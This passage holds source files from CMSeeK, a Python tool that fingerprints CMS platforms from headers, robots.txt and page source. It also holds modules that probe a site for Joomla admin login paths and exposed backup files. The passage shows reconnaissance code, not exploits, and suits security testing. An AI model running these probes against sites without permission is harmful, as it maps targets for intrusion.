129 | # REGEX DETECTIONS STARTS FROM HERE # | |
130 | #################################################### | |
131 | ||
132 | header_detection_keys_regex = [ | |
133 | 'Set-Cookie: (YaBBusername=|YaBBpassword=|YaBBSession|Y2User-(\d.*?)|Y2Pass-(\d.*?)|Y2Sess-(\d.*?))=:-yabb', | |
134 | 'Set-Cookie: xmblv(a|b)=(\d.*?)\n:-xmb', | |
135 | 'Set-Cookie: [a-zA-Z0-9]{5}_(lastpos|lastvisit)=:-pwind', | |
136 | 'Set-Cookie: mybb\[(.*?)\]=:-mybb', | |
137 | 'Set-Cookie: wcf(.*?)_cookieHash=:-bboard', | |
138 | 'X-XRDS-Location: (.*?)EPiServerCommunity:-epis', | |
139 | 'lep(.*?)sessionid:-lepton', | |
140 | 'Set-Cookie: phpbb(.*?)=:-phpbb', | |
141 | 'Set-Cookie: ses(\d+)=:-impage', | |
142 | 'Set-Cookie: sid_customer_[a-zA-Z0-9]{5}=:-csc', | |
143 | 'X-Host: (.*?)weebly.net:-weebly', | |
144 | 'Set-Cookie: (ekmMsg|ekmpowershop):-ekmps' | |
145 | ] | |
146 | # so here's the story, i've been watching regex_key x regex_key for last 2 weeks and i just finished it. | |
147 | # In the following lines you'll find some weird variable names, those are characters from detection_key. | |
148 | # Thank you for reading this utterly useless comment.. now let's get back to work! | |
149 | ||
150 | # Update 2019 - ^ That was a mistake time to fix this abomination | |
151 | for detection_key in header_detection_keys_regex: | |
152 | if ':-' in detection_key: | |
153 | regex_key = detection_key.split(':-') | |
154 | if '||' in regex_key[0]: | |
155 | match_strings = regex_key[0].split('||') | |
156 | for match_string in match_strings: | |
157 | regex_match_status = re.search(match_string, hstring, re.DOTALL) | |
158 | if regex_match_status != None and regex_key[1] not in cmseek.ignore_cms: | |
159 | if cmseek.strict_cms == [] or regex_key[1] in cmseek.strict_cms: | |
160 | return ['1', regex_key[1]] | |
161 | else: | |
162 | regex_match_status = re.search(regex_key[0], hstring, re.DOTALL) | |
163 | if regex_match_status != None and regex_key[1] not in cmseek.ignore_cms: | |
164 | if cmseek.strict_cms == [] or regex_key[1] in cmseek.strict_cms: | |
165 | return ['1', regex_key[1]] | |
166 | else: | |
167 | # Failure | |
168 | return ['0', 'na'] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | ||
7 | def target(target): | |
8 | ## initiate the result | |
9 | target = target.replace('https://','').replace('http://', '').split('/') | |
10 | target = target[0] | |
11 | print(' ┏━Target: ' + cmseek.bold + cmseek.red + target + cmseek.cln) | |
12 | ||
13 | def end(requests, time, log_file): | |
14 | ## end the result | |
15 | print(' ┃\n ┠── Result: ' + cmseek.bold + cmseek.fgreen + log_file + cmseek.cln) | |
16 | print(' ┃\n ┗━Scan Completed in ' + cmseek.bold +cmseek.lblue + time + cmseek.cln +' Seconds, using ' + cmseek.bold + cmseek.lblue + requests + cmseek.cln +' Requests') | |
17 | ||
18 | def cms(cms,version,url): | |
19 | ## CMS section | |
20 | print(' ┃\n ┠── CMS: ' + cmseek.bold + cmseek.fgreen + cms + cmseek.cln +'\n ┃ │') | |
21 | if version != '0' and version != None: | |
22 | print(' ┃ ├── Version: '+ cmseek.bold + cmseek.fgreen + version + cmseek.cln) | |
23 | print(' ┃ ╰── URL: ' + cmseek.fgreen + url + cmseek.cln) | |
24 | ||
25 | def menu(content): | |
26 | # Use it as a header to start off any new list of item | |
27 | print(' ┃\n ┠──' + content) | |
28 | ||
29 | def init_item(content): | |
30 | # The first item of the menu | |
31 | print(' ┃ │\n ┃ ├── ' + content) | |
32 | ||
33 | def item(content): | |
34 | # a normal item just not the first or the last one | |
35 | print(' ┃ ├── ' + content) | |
36 | ||
37 | def empty_item(): | |
38 | print(' ┃ │') | |
39 | ||
40 | def end_item(content): | |
41 | # The ending item | |
42 | print(' ┃ ╰── ' + content) | |
43 | ||
44 | def init_sub(content, slave=True): | |
45 | # initiating a list of menu under a item | |
46 | print(' ┃ │ │\n ┃ │ ├── ' + content if slave else ' ┃ │\n ┃ ├── ' + content) | |
47 | ||
48 | def sub_item(content, slave=True): | |
49 | # a sub item | |
50 | print(' ┃ │ ├── ' + content if slave else ' ┃ ├── ' + content) | |
51 | ||
52 | def end_sub(content, slave=True): | |
53 | # ending a sub item | |
54 | print(' ┃ │ ╰── ' + content if slave else ' ┃ ╰── ' + content) | |
55 | ||
56 | def empty_sub(slave=True): | |
57 | print(' ┃ │ │' if slave else ' ┃ │') | |
58 | ||
59 | ||
60 | def init_subsub(content, slave2=True, slave1=True): | |
61 | # Sub item of a sub item.. this is getting too much at this point | |
62 | part1 = ' ┃ │ ' if slave2 else ' ┃ ' | |
63 | part2 = '│ │' if slave1 else ' │' | |
64 | part3 = '\n ┃ │ ' if slave2 else '\n ┃ ' | |
65 | part4 = '│ ├── ' if slave1 else ' ├── ' | |
66 | content = part1 + part2 + part3 + part4 + content | |
67 | print(content) | |
68 | ||
69 | def subsub(content, slave2=True, slave1=True): | |
70 | part1 = ' ┃ │ ' if slave2 else ' ┃ ' | |
71 | part2 = '│ ├── ' if slave1 else ' ├── ' | |
72 | content = part1 + part2 + content | |
73 | print(content) | |
74 | ||
75 | def end_subsub(content, slave2=True, slave1=True): | |
76 | part1 = ' ┃ │ ' if slave2 else ' ┃ ' | |
77 | part2 = '│ ╰── ' if slave1 else ' ╰── ' | |
78 | content = part1 + part2 + content | |
79 | print(content) |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Detect cms using robots.txt | |
6 | # Rev 1 | |
7 | import re | |
8 | import cmseekdb.basic as cmseek | |
9 | def check(url, ua): | |
10 | robots = url + '/robots.txt' | |
11 | robots_source = cmseek.getsource(robots, ua) | |
12 | # print(robots_source[1]) | |
13 | if robots_source[0] == '1' and robots_source[1] != '': | |
14 | # Check begins here | |
15 | robots_txt_content = robots_source[1] | |
16 | #### START DETECTION FROM HERE | |
17 | ## || <- if either of it matches cms detected | |
18 | ## :::: <- all the strings has to match (implemented to decrease false positives) | |
19 | robots_txt_detection_keys = [ | |
20 | 'If the Joomla site is installed::::Disallow: /administrator/:-joom', | |
21 | 'Allow: /core/*.css$||Disallow: /index.php/user/login/||Disallow: /web.config:-dru', | |
22 | 'Disallow: /wp-admin/||Allow: /wp-admin/admin-ajax.php:-wp', | |
23 | 'Disallow: /kernel/::::Disallow: /language/::::Disallow: /templates_c/:-xoops', | |
24 | 'Disallow: /textpattern:-tpc', | |
25 | 'Disallow: /sitecore||Disallow: /sitecore_files||Disallow: /sitecore modules:-score', | |
26 | 'Disallow: /phpcms||robots.txt for PHPCMS:-phpc', | |
27 | 'Disallow: /*mt-content*||Disallow: /mt-includes/:-moto', | |
28 | 'Disallow: /jcmsplugin/:-jcms', | |
29 | 'Disallow: /ip_cms/||ip_backend_frames.php||ip_backend_worker.php:-impage', | |
30 | 'Disallow: /flex/tmp/||flex/Logs/:-flex', | |
31 | 'Disallow: /e107_admin/||e107_handlers||e107_files/cache:-e107', | |
32 | 'Disallow: /plus/ad_js.php||Disallow: /plus/erraddsave.php||Disallow: /plus/posttocar.php||Disallow: /plus/disdls.php||Disallow: /plus/mytag_js.php||Disallow: /plus/stow.php:-dede', | |
33 | 'modules/contentbox/themes/:-cbox', | |
34 | 'Disallow: /contao/:-contao', | |
35 | 'Disallow: /concrete:-con5', | |
36 | 'Disallow: /auth/cas::::Disallow: /auth/cas/callback:-dscrs', | |
37 | 'uc_client::::uc_server::::forum.php?mod=redirect*:-discuz', | |
38 | 'Disallow: /AfterbuySrcProxy.aspx||Disallow: /afterbuy.asmx||Disallow: /afterbuySrc.asmx:-abuy', | |
39 | 'Disallow: /craft/:-craft', # Chances of it being a falsepositive are higher than the chances of me doing something good with my life ;__; | |
40 | 'Disallow: /app/::::Disallow: /store_closed.html:-csc', | |
41 | 'Disallow: /*?cartcmd=*:-dweb', | |
42 | 'Disallow: /epages/Site.admin/||Disallow: /epages/*:-epgs', | |
43 | 'Disallow: /Mediatheque/:-ezpub', | |
44 | 'robots.txt automaticaly generated by PrestaShop:-presta', | |
45 | 'demandware.store||demandware.static||demandware.net:-sfcc', | |
46 | 'robots.txt for Umbraco||Disallow: /umbraco||Disallow: /umbraco_client:-umbraco', | |
47 | 'we use Shopify:-shopify', | |
48 | 'diskuse::::wysiwyg::::dotaz::::hodnoceni:-shoptet', | |
49 | 'Disallow: /broker::::Disallow: /broker/orders:-smartstore', | |
50 | 'gestion_e_commerce:-solusquare', | |
51 | 'spree/products/:-spree', | |
52 | '/admin::::/_admin::::offset=0::::_print_version:-amiro', | |
53 | 'Disallow: /ajax::::Disallow: /apps:-weebly', | |
54 | 'Disallow: /_backup/::::Disallow: /_mygallery/::::Disallow: /_temp/::::Disallow: /_tempalbums/::::Disallow: /_tmpfileop/::::Disallow: /dbboon/:-godaddywb', | |
55 | 'Disallow: /harming/humans::::Disallow: /ignoring/human/orders::::Disallow: /harm/to/self:-opennemas', | |
56 | 'Zen Cart doesn\'t require any||Zen Cart installation||pzen_:-zencart', | |
57 | 'Disallow: /*action=personalDataProcessing*:-ipo' | |
58 | ] | |
59 | for detection_key in robots_txt_detection_keys: | |
60 | if ':-' in detection_key: | |
61 | detection_array = detection_key.split(':-') | |
62 | if '||' in detection_array[0]: | |
63 | detection_strings = detection_array[0].split('||') | |
64 | for detection_string in detection_strings: | |
65 | if detection_string in robots_txt_content and detection_array[1] not in cmseek.ignore_cms: | |
66 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
67 | return ['1', detection_array[1]] | |
68 | elif '::::' in detection_array[0]: | |
69 | match_status = '0' # 0 = neutral, 1 = passed, 2 = failed | |
70 | match_strings = detection_array[0].split('::::') | |
71 | for match_string in match_strings: | |
72 | if match_status == '0' or match_status == '1': | |
73 | if match_string in robots_txt_content: | |
74 | match_status = '1' | |
75 | else: | |
76 | match_status = '2' | |
77 | else: | |
78 | match_status = '2' | |
79 | if match_status == '1' and detection_array[1] not in cmseek.ignore_cms: | |
80 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
81 | return ['1', detection_array[1]] | |
82 | else: | |
83 | if detection_array[0] in robots_txt_content and detection_array[1] not in cmseek.ignore_cms: | |
84 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
85 | return ['1', detection_array[1]] | |
86 | ||
87 | t3_regex = re.search(r'Sitemap: http(.*?)\?type=', robots_txt_content) | |
88 | if t3_regex != None and 'tp3' not in cmseek.ignore_cms: | |
89 | if cmseek.strict_cms == [] or 'tp3' in cmseek.strict_cms: | |
90 | return ['1', 'tp3'] | |
91 | ||
92 | return ['0',''] | |
93 | else: | |
94 | cmseek.error('robots.txt not found or empty!') | |
95 | return ['0',''] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # This file contains all the methods of detecting cms via Source Code | |
6 | # Version: 1.0.0 | |
7 | # Return a list with ['1'/'0','ID of CMS'/'na'] 1 = detected 0 = not detected 2 = No Sourcecode Provided | |
8 | ||
9 | import re | |
10 | import cmseekdb.basic as cmseek | |
11 | ||
12 | def check(page_source_code, site): ## Check if no generator meta tag available | |
13 | if page_source_code == "": ## No source code provided kinda shitty check but oh well | |
14 | return ['2', 'na'] | |
15 | else: ## The real shit begins here | |
16 | # hstring = s | |
17 | # harray = s.split("\n") ### Array conversion can use if needed later | |
18 | ||
19 | page_source_detection_keys = [ | |
20 | "/wp-content/||/wp-include/:-wp", | |
21 | "/skin/frontend/||x-magento-init:-mg", | |
22 | "https://www.blogger.com/static/:-blg", | |
23 | "ic.pics.livejournal.com:-lj", | |
24 | "END: 3dcart stats:-tdc", | |
25 | "href=\"/apos-minified/:-apos", | |
26 | "href=\"/CatalystStyles/:-abc", | |
27 | "/misc/drupal.js:-dru", | |
28 | "css/joomla.css:-joom", | |
29 | "Powered By <a href=\"http://www.opencart.com\">OpenCart||\"catalog/view/javascript/jquery/swiper/css/opencart.css\"||index.php?route=:-oc", | |
30 | "/xoops.js||xoops_redirect:-xoops", | |
31 | "Wolf Default RSS Feed:-wolf", | |
32 | "/ushahidi.js||alt=\"Ushahidi\":-ushahidi", | |
33 | "getWebguiProperty:-wgui", | |
34 | "title: \"TiddlyWiki\"||TiddlyWiki created by Jeremy Ruston,:-tidw", | |
35 | "Running Squiz Matrix:-sqm", | |
36 | "assets.spin-cdn.com:-spin", | |
37 | "content=\"Solodev\" name=\"author\":-sdev", | |
38 | "content=\"sNews:-snews", | |
39 | "/api/sitecore/:-score", | |
40 | "simsite/:-sim", | |
41 | "simplebo.net/ ||\"pswp__:-spb", | |
42 | "/silvatheme:-silva", | |
43 | "serendipityQuickSearchTermField ||\"serendipity_||serendipity[:-spity", | |
44 | "Published by Seamless.CMS.WebUI:-slcms", | |
45 | "rock-config-trigger||rock-config-cancel-trigger:-rock", | |
46 | "/rcms-f-production.:-rcms", | |
47 | "CMS by Quick.Cms:-quick", | |
48 | "\"pimcore_:-pcore", | |
49 | "xmlns:perc||cm/css/perc_decoration.css:-percms", | |
50 | "PencilBlueController||\"pencilblueApp\":-pblue", | |
51 | "/libraries/ophal.js:-ophal", | |
52 | "Sitefinity/WebsiteTemplates:-sfy", | |
53 | "published by Open Text Web Solutions:-otwsm", | |
54 | "/opencms/export/:-ocms", | |
55 | "odoo.session_info||var odoo =:-odoo", | |
56 | "_spBodyOnLoadWrapper||_spPageContextInfo||_spFormOnSubmitWrapper:-share", | |
57 | "/storage/app/media/:-octcms", | |
58 | "mura.min.css||/plugins/Mura:-mura", | |
59 | "mt-content/||moto-website-style:-moto", | |
60 | "mono_donottrack||monotracker.js ||_monoTracker:-mnet", | |
61 | "Powered by MODX</a>:-modx", | |
62 | "siteCMS:methode\"||\"contentOriginatingCMS=Methode\"||Methode tags version||/r/PortalConfig/common/assets/:-methd", | |
63 | "var LIVESTREET_SECURITY_KEY:-lscms", | |
64 | "/koken.js||data-koken-internal:-koken", | |
65 | "jimdo_layout_css||var jimdoData||isJimdoMobileApp:-jimdo", | |
66 | "<!-- you must provide a link to Indexhibit||\"Built with <a href=http://www.indexhibit.org/>Indexhibit\"||ndxz-studio/site||ndxzsite/:-ibit", | |
67 | "<!-- webflow css -->||css/webflow.css||js/webflow.js:-wflow", | |
68 | "css/jalios/core/||js/jalios/core/||jalios:ready:-jcms", | |
69 | "ip_themes/||ip_libs/||ip_cms/:-impage", | |
70 | "/css_js_cache/hotaru_css||hotaruFooterImg||/css_js_cache/hotaru_js:-hotaru", | |
71 | "binaries/content/gallery/:-hippo", | |
72 | "PHP-Nuke Copyright ©||PHP-Nuke theme by:-phpn", | |
73 | "FlexCMP - CMS per Siti Accessibili||/flex/TemplatesUSR/||FlexCMP - Digital Experience Platform (DXP):-flex", | |
74 | "copyright\" content=\"eZ Systems\"||ezcontentnavigationpart||ezinfo/copyright:-ezpu", | |
75 | "e107_files/e107.js||e107_themes/||e107_plugins/:-e107", | |
76 | "<!-- DNN Platform|| by DNN Corporation -->||DNNROBOTS||js/dnncore.js?||dnn_ContentPane||js/dnn.js?:-dnn", | |
77 | "phpBBstyle||phpBBMobileStyle||style_cookie_settings:-phpbb", | |
78 | "dede_fields||dede_fieldshash||DedeAjax||DedeXHTTP||include/dedeajax2.js||css/dedecms.css:-dede", | |
79 | "/Orchard.jQuery/||orchard.themes||orchard-layouts-root:-orchd", | |
80 | "modules/contentbox/themes/:-cbox", | |
81 | "data-contentful||.contentful.com/||.ctfassets.net/:-conful", | |
82 | "Contensis.current||ContensisSubmitFromTextbox||ContensisTextOnly:-contensis", | |
83 | "system/cron/cron.txt:-contao", | |
84 | "/burningBoard.css||wcf/style/:-bboard", | |
85 | "/concrete/images||/concrete/css||/concrete/js:-con5", | |
86 | "discourse_theme_id||discourse_current_homepage:-discrs", | |
87 | "discuz_uid||discuz_tips||content=\"Discuz! Team and Comsenz UI Team\":-discuz", | |
88 | "flarum-loading||flarum/app:-flarum", | |
89 | "/* IP.Board||js/ipb.js||js/ipb.lang.js:-ipb", | |
90 | "ips_usernameand ips_password:-ipb", | |
91 | "bb_default_style.css||name=\"URL\" content=\"http://www.minibb.net/\":-minibb", | |
92 | "var MyBBEditor:-mybb", | |
93 | "/assets/nodebb.min.js||/plugins/nodebb-:-nodebb", | |
94 | "PUNBB.env||typeof PUNBB ===:-punbb", | |
95 | "Powered by SMF:-smf", | |
96 | "vanilla_discussions_index||vanilla_categories_index:-vanilla", | |
97 | "Forum software by XenForo™||<html id=\"XenForo\"||css.php?css=xenforo:-xf", | |
98 | "<!-- Powered by XMB||<!-- The XMB Group -->||Powered by XMB:-xmb", | |
99 | "yabbfiles/:-yabb", | |
100 | "Powered By AEF:-aef", | |
101 | "Powered by: FUDforum:-fudf", | |
102 | "<div id=\"phorum\">:-phorum", | |
103 | "\"YafHead:-yaf", | |
104 | "<!-- NoNonsense Forum:-nnf", | |
105 | "/mvnplugin/mvnforum/:-mvnf", | |
106 | "aspnetforum.css\"||_AspNetForumContentPlaceHolder:-aspf", | |
107 | "jforum/templates/:-jf", | |
108 | "This OnlineStore is brought to you by ViA-Online GmbH Afterbuy.:-abuy", | |
109 | '/arastta.js:-arstta', | |
110 | '<script src=\'//bizweb.dktcdn.net:-bizw', | |
111 | 'cloudcart","title:-cloudc', | |
112 | 'framework/colormekit.css:-cmshop', | |
113 | '<meta name="keywords" content="moodle:-mdle', | |
114 | '<meta property="ajaris:baseURL"||<meta property="ajaris:language"||<meta property="ajaris:ptoken":-orkis', | |
115 | 'window.Comandia = JSON.parse||<script src="https://cdn.mycomandia.com/static/shop/common/js/functions.js"></script>:-cmdia', | |
116 | '/bundles/elcodimetric/js/tracker.js:-elcd', | |
117 | 'de_epages.remotesearch.ui.suggest||require([[\'de_epages\':-epgs', | |
118 | 'href="https://www.fortune3.com/en/siterate/rate.css":-for3', | |
119 | '<body class="gridlock shifter">::::<div class="shifter-page">:-btree', | |
120 | 'list-unstyled::::editable-zone:-pmoc', | |
121 | '<!-- Demandware Analytics code||<!-- Demandware Apple Pay -->:-sfcc', | |
122 | 'icons__icons___XoCGh||styles__empty___3WCoC||icons__icon-phone___22Eum:-sazito', | |
123 | 'SHOPATRON-CRAWLER:-shopatron', | |
124 | 'Umbraco/||umbraco/:-umbraco', | |
125 | 'Sklep internetowy Shoper.pl:-shoper', | |
126 | '//www.googletagmanager.com/ns.html?id=GTM-N2T2D3:-shopery', | |
127 | 'shopfa_license:-shopfa', | |
128 | '/smjslib.js||/smartstore.core.js:-smartstore', | |
129 | '_W.configDomain||Weebly.footer:-weebly', | |
130 | 'js/whmcs.js:-whmcs', | |
131 | 'OpenNeMaS CMS by Openhost||var u = "https://piwik.openhost.es/":-opennemas', | |
132 | 'zenid=||Congratulations! You have successfully installed your Zen Cart||Google Code for ZenCart Google||Powered by ZenCart||sideboxpzen-cart||stylesheet_zen_lightbox.css:-zencart', | |
133 | 'Redakční systém IPO||cdn.antee.cz/||ipo.min.js:-ipo' | |
134 | ] | |
135 | ||
136 | for detection_key in page_source_detection_keys: | |
137 | if ':-' in detection_key: | |
138 | detection_array = detection_key.split(':-') | |
139 | if '||' in detection_array[0]: | |
140 | idkwhat = detection_array[0] | |
141 | detection_strings = idkwhat.split('||') | |
142 | for detection_string in detection_strings: | |
143 | if detection_string in page_source_code and detection_array[1] not in cmseek.ignore_cms: # check if the cms_id is not in the ignore list | |
144 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
145 | return ['1', detection_array[1]] | |
146 | elif '::::' in detection_array[0]: | |
147 | # :::: is used when we want to check if both detection strings are present in the source code. | |
148 | match_status = '0' # 0 = neutral, 1 = passed, 2 = failed | |
149 | match_strings = detection_array[0].split('::::') | |
150 | for match_string in match_strings: | |
151 | if match_status == '0' or match_status == '1': | |
152 | if match_string in page_source_code: | |
153 | match_status = '1' | |
154 | else: | |
155 | match_status = '2' | |
156 | else: | |
157 | match_status = '2' | |
158 | if match_status == '1' and detection_array[1] not in cmseek.ignore_cms: | |
159 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
160 | return ['1', detection_array[1]] | |
161 | else: | |
162 | if detection_array[0] in page_source_code and detection_array[1] not in cmseek.ignore_cms: | |
163 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
164 | return ['1', detection_array[1]] | |
165 | ||
166 | #################################################### | |
167 | # REGEX DETECTIONS STARTS FROM HERE # | |
168 | #################################################### | |
169 | ||
170 | page_source_detection_regex_keys = [ | |
171 | '(\'|")https\://afosto\-cdn(.*?)\.afosto\.com(.*?)(\'|"):-afsto', | |
172 | 'Powered by(.*?)JForum(.*?)\</a\>:-jf', | |
173 | 'Powered by(.*?)AspNetForum(.*?)(\</a\>|\</span\>):-aspf', | |
174 | 'Powered by(.*?)MercuryBoard(.*?)\</a\>:-mcb', | |
175 | 'Powered by(.*?)mwForum(.*?)Markus Wichitill:-mvnf', | |
176 | 'Powered by(.*?)mvnForum(.*?)\</a\>:-mvnf', | |
177 | 'Powered by myUPB(.*?)\</a\>:-myupb', | |
178 | '\>Powered by UBB\.threads(.*?)\</a\>:-ubbt', | |
179 | 'Powered by(.*?)NoNonsense Forum\</a\>:-nnf', | |
180 | '\>Powered by YAF\.NET(.*?)\</a\>:-yaf', | |
181 | 'aefonload(.*?)\</script\>:-aef', | |
182 | 'applications/vanilla/(.*?)\.js:-vanilla', | |
183 | 'var smf_(theme_url|images_url|scripturl) \=(.*?)\</script\>:-smf', | |
184 | 'Powered by(.*?)PunBB\</a\>:-punbb', | |
185 | 'Powered by(.*?)NodeBB\</a\>:-nodebb', | |
186 | '(Powered By|href\="https\://www\.mybb\.com")(.*?)(MyBB|MyBB Group)\</a\>:-mybb', | |
187 | '(powered by|http\://www\.miniBB\.net)(.*?)(miniBB|miniBB forum software):-minibb', | |
188 | 'Powered by(.*?)FluxBB:-fluxbb', | |
189 | 'invisioncommunity\.com(.*?)Powered by Invision Community:-ipb', | |
190 | 'ipb\.(vars|templates|lang)\[(.*?)=(.*?)\</script\>:-ipb', | |
191 | '(a href\="http\://www\.woltlab\.com"|Forum Software|Forensoftware)(.*?)Burning Board(.*?)\</strong\>:-bboard', | |
192 | 'Discourse\.(.*?)\=(.*?)\</script\>:-dscrs', | |
193 | 'ping\.src \= node\.href(.*?)\</script\>:-arc', | |
194 | 'binaries/(.*?)/content/gallery/:-hippo', | |
195 | '\.php\?m\=(.*?)&c\=(.*?)&a\=(.*?)&catid\=:-phpc', | |
196 | 'Powered by (.*?)phpBB:-phpbb', | |
197 | 'copyright(.*?)phpBB Group:-phpbb', | |
198 | 'Powered by(.*?)Cotonti:-coton', | |
199 | 'CCM_(.*?)(_|)(MODE|URL|PATH|FILENAME|REL|CID):-con5', | |
200 | '\<link href\=(.*?)cdn(\d).bigcommerce\.com\/:-bigc', | |
201 | '\<a href\=(.*?)main_bigware_(\d)\.php:-bigw', | |
202 | 'var Bizweb \=(.*?)\</script\>:-bizw', | |
203 | 'var clientexec \=(.*?)\</script\>||Powered by(.*?)http\://www\.clientexec\.com\?source\=poweredby(.*?)\</a\>:-cexec', | |
204 | '\<meta name\=(.*?)author(.*?)CloudCart LLC(.*?)\>:-cloudc', | |
205 | 'var Colorme \=(.*?)\</script\>:-cmshop', | |
206 | 'https://cdn.mycomandia.com/uploads/comandia_(.*?)/r/(.*?)//js/(functions|main).js:-cmdia', | |
207 | '<script(.*?)cosmoshop_functions.js(.*?)</script>:-cosmos', | |
208 | '.cm-noscript(.*?)</script>:-csc', | |
209 | '<link(.*?)cubecart.common.css(.*?)>:-cubec', | |
210 | '<a href(.*?)http://www.almubda.net(.*?)Powered by Al Mubda(.*?)</a>:-abda', | |
211 | '<!--(.*?)Dynamicweb Software(.*?)-->:-dweb', | |
212 | '<script(.*?)eccube.js(.*?)</script>||<script(.*?)win_op.js(.*?)</script>||<script(.*?)cube.site.js(.*?)</script>:-ecc', | |
213 | '<script(.*?)Tracker generator for elcodi bamboo store(.*?)</script>:-elcd', | |
214 | 'href=(.*?)/epages/(.*?).sf(.*?)</a>:-epgs', | |
215 | '<script(.*?)/extension/iagutils/design/ezwebin/(.*?)</script>:-ezpub', | |
216 | 'Powered by(.*?)Fortune3</a>:-for3', | |
217 | 'Built on(.*?)bigtreecms.org(.*?)BigTree CMS:-btree', | |
218 | 'powered(.*?)opensolution.org(.*?)Sklep internetowy', | |
219 | 'href\=(.*?)on/demandware.static:-sfcc', | |
220 | 'href\=(.*?)mediacdn.shopatron.com||href\=(.*?)cdn.shptrn.com:-shopatron', | |
221 | 'href\=(.*?)rwd_shoper(|_1):-shoper', | |
222 | '(cdn|font).shopery.com/:-shopery', | |
223 | 'href\=(.*?)cdn.shopfa.com/||href\=(.*?)cdnfa.com/:-shopfa', | |
224 | 'id=("|\')(shopify-digital-wallet|shopify-features)||href\=(.*?)cdn.shopify.com/:-shopify', | |
225 | 'href\=(.*?)cdn.myshoptet.com/||content="Shoptet.sk"||var shoptet=:-shoptet', | |
226 | 'css/smartstore.(core|theme|modules).css:-smartstore', | |
227 | 'src=(.*?)spree/(products|brands)||Spree.(api_key|routes|translations):-spree', | |
228 | 'meta name\=("|\')brightspot.(contentId|cached)||href=("|\')brightspotcdn:-brightspot', | |
229 | 'amiro_sys_(css|js).php:-amiro', | |
230 | 'weebly-(footer|icon):-weebly', | |
231 | '/ekmps/(scripts|css|assets|images|shops|designs)||globalstats.ekmsecure.com/hits/stats(-global).js:-ekmps', | |
232 | 'sf_(wrapper|footer|banner|subnavigation|pagetitle):-godaddywb', | |
233 | 'onm-(new|image|carousel|big|cropped):-opennemas', | |
234 | 'ipo(pagetext|mainframe|footer|menuwrapper|copyright|header|main|menu|statistics):-ipo' | |
235 | ] | |
236 | for detection_key in page_source_detection_regex_keys: | |
237 | if ':-' in detection_key: | |
238 | detection_array = detection_key.split(':-') | |
239 | if '||' in detection_array[0]: | |
240 | detection_regex_strings = detection_array[0].split('||') | |
241 | for detection_regex_string in detection_regex_strings: | |
242 | regex_match_status = re.search(detection_regex_string, page_source_code, re.DOTALL) | |
243 | if regex_match_status != None and detection_array[1] not in cmseek.ignore_cms: | |
244 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
245 | return ['1', detection_array[1]] | |
246 | else: | |
247 | regex_match_status = re.search(detection_array[0], page_source_code, re.DOTALL) | |
248 | if regex_match_status != None and detection_array[1] not in cmseek.ignore_cms: | |
249 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
250 | return ['1', detection_array[1]] | |
251 | ||
252 | else: | |
253 | # Failure | |
254 | return ['0', 'na'] |
0 | 1.1.3 |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | def start(id, url, ua, ga, source, ga_content, detection_method='', headers=''): | |
6 | if id == "wp": | |
7 | # for now this is the only cms... but not for long! | |
8 | import deepscans.wp.init as wpscan | |
9 | wpscan.start(id, url, ua, ga, source, detection_method) | |
10 | if id == 'joom': | |
11 | # told ya... not for long | |
12 | import deepscans.joom.init as joomscan | |
13 | joomscan.start(id, url, ua, ga, source) | |
14 | if id == 'umbraco': | |
15 | # umm... whatever | |
16 | import deepscans.umbraco.init as umbracoscan | |
17 | umbracoscan.start(id, url, ua, ga, source, detection_method, headers) |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import threading | |
6 | import cmseekdb.basic as cmseek | |
7 | ||
8 | joom_admin_found = 0 | |
9 | joom_admins = [] | |
10 | ||
11 | def check_admin(url,file,ua): | |
12 | global joom_admin_found, joom_admins | |
13 | file_check = cmseek.check_url(url + '/' + file, ua) | |
14 | if file_check == '1': | |
15 | cmseek.success('Admin login page found: ' + cmseek.bold + cmseek.fgreen + url + '/' + file + cmseek.cln) | |
16 | joom_admin_found += 1 | |
17 | joom_admins.append(file) | |
18 | ||
19 | def start(url, ua): | |
20 | admin_files = ['administrator','admin','panel','webadmin','modir','manage','administration','joomla/administrator','joomla/admin'] | |
21 | threads = [threading.Thread(target=check_admin, args=(url, file ,ua)) for file in admin_files] | |
22 | for thread in threads: | |
23 | thread.start() | |
24 | for thread in threads: | |
25 | thread.join() | |
26 | ||
27 | global joom_admin_found, joom_admins | |
28 | return [joom_admin_found, joom_admins] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import threading | |
6 | import cmseekdb.basic as cmseek | |
7 | ||
8 | joom_bak_found = 0 | |
9 | joom_backups = [] | |
10 | ||
11 | def check_backup(url,file,ua): | |
12 | global joom_bak_found, joom_backups | |
13 | file_check = cmseek.check_url(url + '/' + file, ua) | |
14 | if file_check == '1': | |
15 | cmseek.success('Potential backup file found: ' + cmseek.bold + cmseek.fgreen + file + cmseek.cln) | |
16 | joom_bak_found += 1 | |
17 | joom_backups.append(file) | |
18 | ||
19 | def start(url, ua): | |
